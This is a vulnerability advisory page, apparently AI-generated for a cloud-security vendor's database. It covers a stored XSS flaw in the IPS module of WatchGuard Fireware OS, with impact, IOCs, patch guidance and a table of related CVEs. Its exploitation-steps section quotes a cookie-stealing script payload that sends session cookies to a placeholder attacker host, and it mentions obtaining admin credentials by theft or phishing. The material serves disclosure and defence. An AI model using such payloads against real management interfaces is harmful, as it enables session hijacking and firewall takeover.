CVE-2025-6946
WatchGuard Firebox vulnerability analysis and mitigation

Overview

CVE-2025-6946 is a Stored Cross-Site Scripting (XSS) vulnerability in WatchGuard Fireware OS, specifically within the IPS (Intrusion Prevention System) module. The flaw allows an authenticated administrator to inject malicious scripts that are persistently stored and later executed in the web management interface. It affects WatchGuard Firebox devices running Fireware OS versions 12.0 through 12.11.2 (and 12.5 through 12.5.12 in the 12.5.x branch). The vulnerability was published on December 4, 2025, with a patch advisory (WGSA-2025-00011) released by WatchGuard. It carries a CVSS v3.1 base score of 4.8 (Medium) (WatchGuard Advisory, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). The root cause is insufficient sanitization of user-supplied input within the IPS module of the Fireware OS web management interface, allowing malicious script content to be stored and rendered in the browser of any administrator who subsequently views the affected page. Exploitation requires an authenticated administrator session to a locally managed Firebox, meaning the attacker must already possess high-privilege credentials. The attack vector is network-based, requires user interaction (a victim administrator must view the injected content), and the scope is changed — meaning the injected script executes in the context of the victim's browser session rather than the server (WatchGuard Advisory, Red Hat CVE).

Impact

Successful exploitation could allow an attacker to steal administrator session cookies, manipulate the Firebox web management interface, expose sensitive firewall configuration details, or conduct targeted attacks against other administrative users. Because the injected script executes in the context of an authenticated administrator's browser session, an attacker could potentially hijack that session to perform unauthorized administrative actions on the Firebox. Availability is not directly impacted, but confidentiality and integrity of the management plane are at risk (WatchGuard Advisory, Red Hat CVE).

Exploitability

There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation as of the time of disclosure. The EPSS score is approximately 0.043%, reflecting a low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is further constrained by the requirement for high-privilege (administrator-level) authenticated access to a locally managed Firebox, significantly limiting the attacker pool (WatchGuard Advisory, Red Hat CVE).

Exploitation steps

  1. Gain Administrator Access: Obtain valid administrator credentials for a locally managed WatchGuard Firebox running Fireware OS 12.0–12.11.2, either through credential theft, phishing, or insider access.
  2. Navigate to IPS Module: Log into the Firebox web management interface and navigate to the IPS (Intrusion Prevention System) configuration section.
  3. Inject Malicious Payload: Enter a crafted XSS payload (e.g., <script>document.location='http://attacker.com/steal?c='+document.cookie</script>) into an input field within the IPS module that is not properly sanitized before storage.
  4. Payload Persistence: The malicious script is stored in the device's configuration or log display, persisting across sessions.
  5. Trigger Execution: Wait for another administrator (or use social engineering) to view the affected IPS module page, causing the stored script to execute in their browser context.
  6. Harvest Session Data: The script exfiltrates the victim administrator's session cookie or performs actions on their behalf, potentially enabling full management interface takeover (WatchGuard Advisory).

Indicators of compromise

  • Network: Unexpected outbound HTTP/HTTPS requests from an administrator's browser to unknown external domains immediately after accessing the Firebox web management interface; unusual DNS queries originating from admin workstations during management sessions.
  • Logs: Fireware OS web management access logs showing unusual or encoded content submitted to IPS module configuration fields; repeated access to IPS-related management pages by multiple administrator accounts in a short timeframe.
  • Browser/Session: Unexpected session terminations or re-authentication prompts for administrator accounts; administrator accounts performing configuration changes not initiated by the known user.
  • File System / Configuration: Unexpected or unrecognized script-like strings (e.g., <script>, javascript:, onerror=) present in IPS module configuration data or stored policy fields on the Firebox.

Mitigation and workarounds

WatchGuard has released patched versions of Fireware OS to address this vulnerability: upgrade to version 12.11.3 or later (for the 12.x branch) or 12.5.13 or later (for the 12.5.x branch). Organizations should apply the update as described in WatchGuard Security Advisory WGSA-2025-00011. As interim mitigations, restrict administrative access to the Firebox management interface to trusted personnel only, enforce multi-factor authentication (MFA) for all administrator accounts, and monitor and audit administrative sessions for anomalous activity (WatchGuard Advisory).

Community reactions

The vulnerability received limited public attention given its medium severity and high privilege requirement. It was noted in standard vulnerability tracking feeds and databases including Vulners, CVEFeed, and CIRCL. A brief mention appeared on Mastodon/infosec.exchange, but no significant researcher commentary or media coverage was identified beyond routine CVE publication notices (Red Hat CVE).

Additional resources


SourceThis report was generated using AI

Related WatchGuard Firebox vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-13722HIGH8.6
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026
CVE-2026-13384HIGH8.6
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026
CVE-2026-13383HIGH8.6
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026
CVE-2026-8247HIGH7.7
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026
CVE-2026-13728MEDIUM5.9
  • WatchGuard Firebox logoWatchGuard Firebox
  • cpe:2.3:o:watchguard:fireware
NoYesJul 03, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management